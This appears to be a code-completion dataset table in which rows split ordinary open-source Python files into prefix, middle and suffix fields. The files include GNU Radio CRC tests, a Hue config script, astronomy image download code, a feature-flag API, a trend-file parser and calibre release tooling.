repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
---|---|---|---|---|---|---|---|---|
daniestevez/gr-satellites
|
python/qa_crc.py
|
Python
|
gpl-3.0
| 6,774 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2022 Daniel Estevez <daniel@destevez.net>
#
# This file is part of gr-satellites
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from gnuradio import gr, blocks, gr_unittest
import numpy as np
import pmt
# bootstrap satellites module, even from build dir
try:
import python as satellites
except ImportError:
pass
else:
import sys
sys.modules['satellites'] = satellites
from satellites import crc, crc_append, crc_check
class qa_crc(gr_unittest.TestCase):
def setUp(self):
"""Common part of all CRC tests
Creates a flowgraph, a Message Debug block, and a PDU
containing the numbers 0x00 through 0x0F.
"""
self.tb = gr.top_block()
self.dbg = blocks.message_debug()
self.data = list(range(16))
self.pdu = pmt.cons(pmt.PMT_NIL,
pmt.init_u8vector(len(self.data), self.data))
def run_crc_append(self, crc_params, crc_result):
"""Common part of CRC Append tests
Creates a CRC Append block with the specified crc_params parameters,
connects it to the Message Debug block, sends a test PDU to the
CRC Append block, and checks that the output PDU matches the expected
crc_result.
"""
crc_append_block = crc_append(*crc_params)
self.tb.msg_connect((crc_append_block, 'out'), (self.dbg, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out[:len(self.data)], self.data)
self.assertEqual(out[len(self.data):], crc_result)
def common_test_crc_check(self, matching_crc, header_bytes=0):
"""Common part of CRC Check tests
Creates a CRC Append block and a CRC Check block using either the
same CRC or a different one depending on the whether matching_crc
is True or False. Connects CRC Append -> CRC Check -> Message Debug
and sends a PDU through. There are two message debugs to allow
checking whether the PDU ended up in the ok or fail port of the
CRC Check block.
"""
crc_append_block = crc_append(
16, 0x1021, 0x0, 0x0, False, False, False, header_bytes)
x = 0x0 if matching_crc else 0xFFFF
crc_check_block = crc_check(
16, 0x1021, x, x, False, False, False, True, header_bytes)
self.dbg_fail = blocks.message_debug()
self.tb.msg_connect((crc_append_block, 'out'), (crc_check_block, 'in'))
self.tb.msg_connect((crc_check_block, 'ok'), (self.dbg, 'store'))
self.tb.msg_connect((crc_check_block, 'fail'),
(self.dbg_fail, 'store'))
crc_append_block.to
|
_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
def test_crc_check(self):
"""Test a successful CRC check
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True)
self.assertEqu
|
al(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_header_bytes(self):
"""Test a successful CRC check (skipping some header bytes)
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True, header_bytes=5)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_wrong_crc(self):
"""Test a failed CRC check
Checks that the PDU ends in the fail port of CRC check
"""
self.common_test_crc_check(matching_crc=False)
self.assertEqual(self.dbg.num_messages(), 0)
self.assertEqual(self.dbg_fail.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg_fail.get_message(0)))
self.assertEqual(out, self.data)
def test_crc_append_crc16_ccitt_zero(self):
"""Test CRC-16-CCITT-Zero calculation"""
self.run_crc_append(
(16, 0x1021, 0x0, 0x0,
False, False, False),
[0x51, 0x3D])
def test_crc_append_crc16_ccitt_false(self):
"""Test CRC-16-CCITT-False calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0x0,
False, False, False),
[0x3B, 0x37])
def test_crc_append_crc16_ccitt_x25(self):
"""Test CRC-16-CCITT-X.25 calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0xFFFF,
True, True, False),
[0x13, 0xE9])
def test_crc_append_crc32(self):
"""Test CRC-32 calculation"""
self.run_crc_append(
(32, 0x4C11DB7, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xCE, 0xCE, 0xE2, 0x88])
def test_crc_append_crc32c(self):
"""Test CRC-32C calculation"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xD9, 0xC9, 0x08, 0xEB])
def test_crc_append_crc32c_endianness_swap(self):
"""Test CRC-32C calculation with endianness swapped"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, True),
[0xEB, 0x08, 0xC9, 0xD9])
def test_crc_append_crc32c_skip_header_bytes(self):
"""Test CRC-32C calculation skipping some header bytes"""
skip_bytes = 3
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False, skip_bytes),
[0xE8, 0x62, 0x60, 0x68])
class qa_crc_class(gr_unittest.TestCase):
def test_crc_crc32c(self):
"""Test CRC-32C calculation (using crc class directly)"""
c = crc(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF, True, True)
out = c.compute(list(range(16)))
self.assertEqual(c.compute(list(range(16))),
0xD9C908EB)
if __name__ == '__main__':
gr_unittest.run(qa_crc)
gr_unittest.run(qa_crc_class)
|
vmanoria/bluemix-hue-filebrowser
|
update-hue-ini.py
|
Python
|
gpl-2.0
| 1,829 | 0.02515 |
## update-hue-ini.py
##
## This script will extract the appropriate IBM Analytics for Apache Hadoop credentials from the VCAP_SERVICES
## environment variable inside a running container. It will add the username and password to the hue.ini file
## so that the hue application has access to a specific instance
import sys
import os
impo
|
rt json
username = None
password = None
webhdfsurl = None
srcfile = sys.argv[1]
destfile = sys.argv[2]
if "VCAP_SERVICES" in os.environ:
vcaps = json.loads(os.environ["VCAP_SERVICES"])
if "Analytics for
|
Apache Hadoop" in vcaps:
username = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["userid"]
password = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["password"]
webhdfsurl = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["WebhdfsUrl"]
else:
if "WEBHDFS_USER" in os.environ:
username=os.environ["WEBHDFS_USER"]
if "WEBHDFS_PASSWORD" in os.environ:
password=os.environ["WEBHDFS_PASSWORD"]
if "WEBHDFS_URL" in os.environ:
webhdfsurl=os.environ["WEBHDFS_URL"]
if (username is not None and password is not None and webhdfsurl is not None):
filedata = None
with open (srcfile,'r') as file:
filedata = file.read()
filedata = filedata.replace('%instance_user%', username)
filedata = filedata.replace('%instance_user_password%', password)
filedata = filedata.replace('%webhdfs_url%', webhdfsurl)
with open (destfile,'w') as file:
file.write(filedata)
sys.exit(0)
else:
sys.stderr.write('Fatal error: cannot find Web HDFS credentials and/or endpoint\n')
if username is None:
sys.stderr.write('username missing\n')
if password is None:
sys.stderr.write('password missing\n')
if webhdfsurl is None:
sys.stderr.write('URL endpoint missing\n')
sys.exit(1)
|
blackball/an-test6
|
util/usnob_get_region.py
|
Python
|
gpl-2.0
| 3,265 | 0.033691 |
#! /usr/bin/env python
from urllib2 import urlopen
from urllib import urlencode
from urlparse import urlparse, urljoin
import os.path
from numpy import *
from astrometry.util.file import *
from astrometry.util.usnob_get_image import *
from optparse import OptionParser
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-r', '--ra-low', '--ra-lo', '--ra-min',
dest='ralo', type=float, help='Minimum RA')
parser.add_option('-R', '--ra-high', '--ra-hi', '--ra-max',
dest='rahi', type=float, help='Maximum RA')
parser.add_option('-d', '--dec-low', '--dec-lo', '--dec-min',
dest='declo', type=float, help='Minimum Dec')
parser.add_option('-D', '--dec-high', '--dec-hi', '--dec-max',
dest='dechi', type=float, help='Maximum Dec')
parser.add_option('-p', '--prefix',
dest='prefix', help='Output file prefix')
parser.add_option('-s', '--survey',
dest='survey', help='Grab only one USNOB survey: poss-i, poss-ii, ... (see http://www.nofs.navy.mil/data/fchpix/cfch.html')
parser.add_option('-P', '--plate',
dest='plate', help='Grab only one USNOB plate: "se0161", for example')
parser.add_option('-c', '--continue',
dest='cont', action='store_true', help='Continue a previously interrupted transfer')
parser.set_defaults(prefix='usnob', survey=None, plate=None,
ralo=None, rahi=None, declo=None, dechi=None, cont=False)
(opt, args) = parser.parse_args()
if opt.ralo is None or opt.rahi is None or opt.declo is None or opt.dechi is None:
parser.print_help()
parser.error('RA,Dec lo,hi are required.')
radecs = []
decstep = 14./60.
Dec = arange(opt.declo, opt.dechi+decstep, decstep)
for dec in Dec:
rastep = 14./60./cos(deg2rad(dec))
RA = arange(opt.ralo , opt.rahi +rastep , rastep)
for ra in RA:
radecs.append((ra,dec))
radecs = array(radecs)
# Retrieve them in order of distance from the center of the regio
|
n...
#dists = [distsq_between_radecs(r,d, (opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
# for (r,d) in radecs]
dists = distsq_between_radecs(radecs[:,0], radecs[:,1],
(opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
order = argsort(dists)
for (ra,dec) in radecs[order]:
(jpeg,fits) = get_usnob_images(ra, dec, fits=True, survey=opt.survey, justurls=T
|
rue)
print 'got jpeg urls:', jpeg
print 'got fits urls:', fits
if opt.plate is None:
keepjpeg = jpeg
keepfits = fits
else:
keepjpeg = [u for u in jpeg if opt.plate in u]
keepfits = [u for u in fits if opt.plate in u]
print 'keep jpeg urls:', keepjpeg
print 'keep fits urls:', keepfits
base = opt.prefix + '-%.3f-%.3f-' % (ra,dec)
for url in keepjpeg:
# like "fchlwFxSl_so0194.000.jpg"
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
for url in keepfits:
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn + '.fits'
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
|
endlessm/chromium-browser
|
tools/swarming_client/third_party/infra_libs/infra_types/__init__.py
|
Python
|
bsd-3-clause
| 327 | 0 |
# Copyright 2014
|
The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from infra_libs.infra_types.infra_types import freeze
from infra_libs.infra_type
|
s.infra_types import thaw
from infra_libs.infra_types.infra_types import FrozenDict
|
CianciuStyles/project-euler
|
011.py
|
Python
|
mit
| 1,763 | 0.028361 |
import time
def check_vertical(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)):
product = matrix[row][col] * matrix[row+1][col] * matrix[row+2][col] * matrix[row+3][col]
max_product = max(product, max_product)
return max_product
def check_horizontal(matrix):
max_product = 0
for row in xrange(0, len(matrix)):
for col in xrange(0, len(matrix)-3):
product = reduce(lambda x,y: x*y, matrix[row][col:col+3])
max_product = max(product, max_product)
return max_product
def check_left_diagonal(matrix):
max_product = 0
for row in
|
xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row][col] * matrix[row+1][col+1] * matrix[row+2][col+2] * matrix[row+3][col+3]
max_product = max(product, max_product)
return max_product
def check_right_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row+3][col] * matrix[row+2][col+1] * matrix[row+1][col+2] * matrix[row][col+3]
max_product = m
|
ax(product, max_product)
return max_product
def main():
with open("011.txt", "r") as f:
# Read the matrix from the text file, and store in an integet 2-dimensional array
matrix = []
for line in f.readlines():
matrix.append([int(num) for num in line.split(" ")])
# print matrix
# Check the matrix along the various directions, and find the max product of four adjacent numbers
print("The result is %d." % max(check_vertical(matrix), check_horizontal(matrix), check_left_diagonal(matrix), check_right_diagonal(matrix)))
if __name__ == '__main__':
start = time.time()
main()
done = time.time()
print("The solution took %.4f seconds to compute." % (done - start))
|
pombredanne/flagon
|
src/flagon/status_api/__init__.py
|
Python
|
mit
| 3,360 | 0 |
# The MIT License (MIT)
#
# Copyright (c) 2014 Steve Milner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Status API for flags.
"""
import json
from werkzeug.wrappers import Request, Response
from werkzeug.routing import Map, Rule
from werkzeug.exceptions import HTTPException, NotFound
from flagon.errors import Un
|
knownFeatureError
class FlagonStatusAPI(object):
"""
Simple Flag status read-only REST api.
"""
_url_map = Map([
Rule('/v0/<flag>', endpoint='flag_status')
])
def __init__(sel
|
f, backend):
"""
Creates the API object. Requires a pre-configured backend.
"""
self._backend = backend
def wsgi_app(self, environ, start_response):
"""
The WSGI App entry point.
"""
request = Request(environ)
response = self.dispatch_request(request)
return response(environ, start_response)
def dispatch_request(self, request):
"""
Dispatcher for requests. Usees the _url_map to find the
proper view to call.
"""
adapter = self._url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
return getattr(self, endpoint)(request, **values)
except HTTPException, e:
return e
def __call__(self, environ, start_response):
"""
Callable interface which forwards to wsgi_app.
"""
return self.wsgi_app(environ, start_response)
# VIEWS
def flag_status(self, request, flag):
response = Response(content_type='application/json')
response.headers.add_header(
'Cache-Control', 'no-cache, no-store, must-revalidate')
try:
active = self._backend.is_active(flag)
response.data = json.dumps({
'active': bool(active), 'known': True})
response.status_code = 200
return response
except UnknownFeatureError:
response.data = json.dumps({
'active': False, 'known': False})
response.status_code = 404
return response
def run_local_test_server(backend):
"""
Runs a local test server using the given backend/
"""
from werkzeug.serving import run_simple
run_simple('127.0.0.1', 5000, FlagonStatusAPI(backend))
|
MattNolanLab/ei-attractor
|
grid_cell_model/simulations/common/simulation_stationary.py
|
Python
|
gpl-3.0
| 3,476 | 0.000575 |
'''Main simulation run: Simulation of a stationary bump.'''
from __future__ import absolute_import, print_function, division
from numpy.random import choice
from nest.hl_api import NESTError
from grid_cell_model.models.parameters import getOptParser
from grid_cell_model.models.gc_net_nest import BasicGridCellNetwork
from grid_cell_model.models.seeds import TrialSeedGenerator
from grid_cell_model.parameters.data_sets import DictDataSet
from grid_cell_model.visitors.spikes import SpikeStatsVisitor
from grid_cell_model.visitors.signals import AutoCorrelationVisitor
from simtools.storage import DataStorage
def signal_analysis(data):
'''Run the signal analysis visitors on a single data trial.
Parameters
----------
data : dict
A dictionary containing data of one trial.
Returns
-------
data : dict
Input data modified in-situ.
'''
monName = 'stateMonF_e'
stateList = ['I_clamp_GABA_A']
dummy_data_set
|
= DictDat
|
aSet(data)
stats_visitor_e = SpikeStatsVisitor("spikeMon_e", forceUpdate=False)
ac_visitor = AutoCorrelationVisitor(monName, stateList, forceUpdate=False)
stats_visitor_e.visitDictDataSet(dummy_data_set)
ac_visitor.visitDictDataSet(dummy_data_set)
# Clean the state monitor
data['stateMonF_e'] = [data['stateMonF_e'][0]]
return data
parser = getOptParser()
(options, args) = parser.parse_args()
output_fname = "{0}/{1}job{2:05}_output.h5".format(options.output_dir,
options.fileNamePrefix,
options.job_num)
d = DataStorage.open(output_fname, 'a')
if "trials" not in d.keys():
d['trials'] = []
seed_gen = TrialSeedGenerator(int(options.master_seed))
overalT = 0.
###############################################################################
for trial_idx in range(len(d['trials']), options.ntrials):
print("\n\t\tStarting trial no. {0}\n".format(trial_idx))
seed_gen.set_generators(trial_idx)
d['master_seed'] = int(options.master_seed)
d['invalidated'] = 1
try:
ei_net = BasicGridCellNetwork(options, simulationOpts=None)
const_v = [0.0, 0.0]
ei_net.setConstantVelocityCurrent_e(const_v)
stateRecF_e = choice(ei_net.E_pop, options.gammaNSample, replace=False)
stateRecF_i = choice(ei_net.I_pop, options.gammaNSample, replace=False)
stateMonF_e_params = {
'withtime': False,
'interval': options.sim_dt * 10,
'record_from': ['I_clamp_GABA_A']
}
stateMonF_e = ei_net.getGenericStateMonitor(stateRecF_e,
stateMonF_e_params,
'stateMonF_e')
d['net_params'] = ei_net.getNetParams() # Common settings will stay
d.flush()
ei_net.simulate(options.time, printTime=options.printTime)
ei_net.endSimulation()
d['trials'].append(signal_analysis(ei_net.getAllData()))
d.flush()
constrT, simT, totalT = ei_net.printTimes()
overalT += totalT
except NESTError as e:
print("Simulation interrupted. Message: {0}".format(str(e)))
print("Trying to save the simulated data if possible...")
break
d.close()
print("Script total run time: {0} s".format(overalT))
###############################################################################
|
ffunenga/virtuallinks
|
tests/core/test_installing.py
|
Python
|
mit
| 2,693 | 0 |
import pytest
import os
import shutil
import core
virtuallinks = core.import_package('virtuallinks')
def setup_function(function):
shutil.rmtree('temporary', ignore_errors=True)
os.mkdir('temporary')
os.chdir('temporary')
def teardown_function(function):
os.chdir('..')
shutil.rmtree('temporary', ignore_errors=True)
def test_unmonitor_fail():
with pytest.raises(KeyError):
virtuallinks.unmonitor('open')
def test_monitor_double_unmonitor():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
virtuallinks.monitor('open')
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_unmonitor_double():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_after_inspector(capsys):
virtuallinks.enable_inspector()
virtuallinks.m
|
onitor('open')
out, err = capsys.readouterr()
assert out == ''
assert err == ''
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
def _test_monitor_inspector_interleaved_0(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallin
|
ks.disable_inspector()
with open('file.txt', 'w') as f:
f.write('')
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_1(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_2(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_3(capsys):
virtuallinks.monitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
virtuallinks.unmonitor_all()
virtuallinks.unlink_all()
|
stefanbraun-private/pyVisiToolkit
|
src/trend/datasource/trendfile.py
|
Python
|
gpl-3.0
| 49,022 | 0.023622 |
#!/usr/bin/env python
# encoding: utf-8
"""
trend.datasource.trendfile.py
Handling and parsing of trendfiles (*.hdb)
Copyright (C) 2016/2017 Stefan Braun
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import ctypes
import os
import datetime
import calendar
from trend.datasource.dbdata import HighLevelDBData as DBData
from trend.datasource.dbdata import HighLevelDBData2 as DBData2
import configparser
import string
import re
import collections
import misc.timezone as timezone
import itertools
from operator import itemgetter
DEBUGGING = True
class DBData_Timestamp_Search_Result(object):
"""
contains lists of DBData elements after search for a specific point of time:
-exact: elements with equal timestamps
if "exact"-list is empty, then these lists help to calculate values in between:
-before: elements with same timestamps before point of time
-after: elements with same timestamps after point of time
"""
def __init__(self):
self.before_list = []
self.exact_list = []
self.after_list = []
def set_before(self, before_list):
self.before_list = before_list
def set_exact(self, exact_list):
self.exact_list = exact_list
def set_after(self, after_list):
self.after_list = after_list
def get_trendfile_structure_obj(file_fullpath):
"""
returns appropriate structure for accessing all DBData elements
(ctypes.Structure doesn't allow unknown amounts of elements)
"""
DMSDP_NOF_BYTES = 83 # based on observations made in class "PDBSData" (pdbsdata.py)
TRENDDATA_OFFSET = 1024 # based ob reverse engineering *.hdb file format
filesize = os.path.getsize(file_fullpath)
# DBData could be ProMoS NT(c) version 1.x or version 2 =>choosing right version
# trendfiles v1.x ends with ".hdb" , v2.x ends with ".hdbx"
file_ext = file_fullpath.split('.')[-1]
if file_ext.upper() == u'HDB':
# using ProMoS NT(c) version 1.x
curr_DBData_class =
|
DBData
else:
# using ProMoS NT(c) version 2.x
curr_DBData_class = DBData2
nof_dbdata_elems = (filesize - TRENDDATA_OFFSET) / ctypes.sizeof(curr_DBData_class)
class Trendfile_structure(ctypes.LittleEndianStructure):
"""
Header contains DMS datapoint name,
data section contains
|
all DBData elements, amount depends on filesize...
"""
# contains some hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
_fields_ = [
("dmsDatapoint", ctypes.c_char * DMSDP_NOF_BYTES), # DMS datapoint name
("UNKNOWN_BYTES", ctypes.c_char * (TRENDDATA_OFFSET - DMSDP_NOF_BYTES)), # perhaps unused
("dbdata", curr_DBData_class * nof_dbdata_elems) # array of DBData elements
]
# return an instance to caller
return Trendfile_structure()
class RawTrendfile(object):
def __init__(self, fileFullpath):
self._fileFullpath = fileFullpath
self._trendstruct = get_trendfile_structure_obj(self._fileFullpath)
self._parseFile_()
def _parseFile_(self):
# reading binary trendfile into ctypes structure
# contains hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
with open(self._fileFullpath, "rb") as f:
f.readinto(self._trendstruct)
def get_dms_Datapoint(self):
return self._trendstruct.dmsDatapoint
def get_nof_dbdata_elements(self):
return len(self._trendstruct.dbdata)
def get_first_timestamp(self):
return self._trendstruct.dbdata[0].get_datetime()
def get_last_timestamp(self):
return self._trendstruct.dbdata[-1].get_datetime()
def get_dbdata_elements_generator(self, start_datetime=None, end_datetime=None):
"""
a generator for memory efficient retrieving DBData elements
(caller can only loop once through generator,
read here: http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python )
=>optional arguments allows filtering of DBData elements
"""
# FIXME: implement some filtering (same as in "trendfile.py.old"?) Or is further filtering done in HighLevelTrendfile?
for elem in self._trendstruct.dbdata:
ignore = False
if start_datetime:
if elem.get_datetime() < start_datetime:
ignore = True
if end_datetime:
if elem.get_datetime() > end_datetime:
ignore = True
if not ignore:
yield elem
def get_dbdata_elements_as_set(self):
"""
returns DBData elements in a set()
"""
# FIXME: should we improve this code? How can we get good performance in Megabytes of trenddata?
# FIXME: Should we save the set() for next function execution, or does we allow altering of trenddata in-memory?
return set(self._trendstruct.dbdata)
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
"""
# FIXME: method works as expected, but we should find a cleaner solution...
search_result = DBData_Timestamp_Search_Result()
# begin and end indeces of three lists don't overlap: [before_begin, ..., before_end] [exact_begin, ..., exact_end] [after_begin, ..., after_end]
# based on examples from https://docs.python.org/2/library/bisect.html
idx_bisect_left = self._get_bisect_left(timestamp_datetime)
# based on example: "Locate the leftmost value exactly equal to x"
# =>collecting all DBData elements with given timestamp
if idx_bisect_left == len(self._trendstruct.dbdata):
# special case: timestamp is higher than highest DBData-timestamp
# =>do workaround: taking last element and continue processing...
curr_elem = self._trendstruct.dbdata[-1]
else:
curr_elem = self._trendstruct.dbdata[idx_bisect_left]
if idx_bisect_left != len(self._trendstruct.dbdata) and curr_elem.get_datetime() == timestamp_datetime:
# we found "exact_begin"
# appending all elements with same timestamp
idx = idx_bisect_left
exact_timestamp = curr_elem.get_datetime()
while idx < len(self._trendstruct.dbdata):
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == exact_timestamp:
search_result.exact_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
else:
# no exact search hits found... =>populating list "before"
if idx_bisect_left > 0:
idx = idx_bisect_left - 1
before_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx >= 0:
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == before_timestamp:
search_result.before_list.append(self._trendstruct.dbdata[idx])
idx = idx - 1
else:
break
# ... and populating list "after"
# based on example "Find leftmost value greater than x"
idx_bisect_right = self._get_bisect_right(timestamp_datetime)
if idx_bisect_right != len(self._trendstruct.dbdata):
idx = idx_bisect_right
after_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx < len(self._trendstruct.dbdata):
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == after_timestamp:
search_result.after_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
return search_result
def _get_bisect_left(self, timestamp_datetime):
"""
returns index of DBData element with exact timestamp or later
"""
# our DBData elements are sorted by timestamp
# =>we can use binary searching! There's already class "bisect" for this.
# =>problem: using "bisect" is impossible, it can't handle DB
|
FRidh/python-acoustics
|
tests/test_decibel.py
|
Python
|
bsd-3-clause
| 451 | 0.019956 |
fr
|
om acoustics.decibel i
|
mport *
def test_dbsum():
assert(abs(dbsum([10.0, 10.0]) - 13.0103) < 1e-5)
def test_dbmean():
assert(dbmean([10.0, 10.0]) == 10.0)
def test_dbadd():
assert(abs(dbadd(10.0, 10.0) - 13.0103) < 1e-5)
def test_dbsub():
assert(abs(dbsub(13.0103, 10.0) - 10.0) < 1e-5)
def test_dbmul():
assert(abs(dbmul(10.0, 2) - 13.0103) < 1e-5)
def test_dbdiv():
assert(abs(dbdiv(13.0103, 2) - 10.0) < 1e-5)
|
yeyanchao/calibre
|
setup/publish.py
|
Python
|
gpl-3.0
| 3,819 | 0.008117 |
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import os, shutil, subprocess, glob
from setup import Command, __appname__, __version__
class Stage1(Command):
description = 'Stage 1 of the publish process'
sub_commands = [
'check',
'pot',
'build',
'resources',
'translations',
'iso639',
'gui',
]
class Stage2(Command):
description = 'Stage 2 of the publish process'
sub_commands = ['linux', 'win', 'osx']
def pre_sub_commands(self, opts):
for x in glob.glob(os.path.join(self.d(self.SRC), 'dist', '*')):
os.remove(x)
build = os.path.join(self.d(self.SRC), 'build')
if os.path.exists(build):
shutil.rmtree(build)
class Stage3(Command):
description = 'Stage 3 of the publish process'
sub_commands = ['upload_user_manual', 'upload_demo', 'sdist', 'tag_release']
class Stage4(Command):
description = 'Stage 4 of the publish process'
sub_commands = ['upload_installers']
class Stage5(Command):
description = 'Stage 5 of the publish process'
sub_commands = ['upload_to_server']
def run(self, opts):
subprocess.check_call('rm -rf build/* dist/*', shell=True)
class Publish(Command):
description = 'Publish a new calibre release'
sub_commands = ['stage1', 'stage2', 'stage3', 'stage4', 'stage5', ]
class Manual(Command):
description='''Build the User Manual '''
def run(self, opts):
cwd = os.path.abspath(os.getcwd())
os.chdir(os.path.join(self.SRC, '..', 'manual'))
try:
for d in ('.build', 'cli'):
if os.path.exists(d):
shutil.rmtree(d)
os.makedirs(d)
if not os.path.exists('.build'+os.sep+'html'):
os.makedirs('.build'+os.sep+'html')
os.environ['__appname__'] = __appname__
os.environ['__version__'] = __version__
subprocess.check_call(['sphinx-build', '-b', 'html', '-t', 'online',
'-d', '.build/doctrees', '.', '.build/html'])
|
subprocess.check_call(['sphinx-build', '-b', 'myepub', '-d',
'.build/doctrees', '.', '.build/epub'])
|
subprocess.check_call(['sphinx-build', '-b', 'mylatex', '-d',
'.build/doctrees', '.', '.build/latex'])
pwd = os.getcwdu()
os.chdir('.build/latex')
